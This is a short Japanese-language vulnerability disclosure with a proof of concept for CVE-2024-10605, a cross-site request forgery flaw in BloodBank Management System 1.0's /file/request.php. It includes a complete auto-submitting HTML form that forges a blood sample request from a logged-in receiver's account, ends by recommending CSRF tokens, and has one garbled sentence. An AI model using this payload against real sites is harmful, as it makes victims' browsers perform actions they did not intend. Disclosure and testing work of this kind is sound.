
CVE-2024-10605の概念実証。BloodBank Management System 1.0のCSRF脆弱性で、不正な血液サンプル要求を可能にします。
file/request.phpこのエンドポイント /file/request.php に Cross Site Request Forgery が存在し、リモートユーザーがログイン中の receiver のアカウントで、選択した病院の利用可能な血液サンプルから blood sample リクエストを開始できるようになります。
悪用に成功すると、被害者に代わってが行われる可能性があります。さらに、ペイロードを含む悪意のあるウェブサイトにアクセスすることで悪用される可能性があります。
以下は、ログインしている receiver のアカウントから blood sample リクエストを開始する CSRF PoC 攻撃 の例です:
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
csrf tokens を含めてください。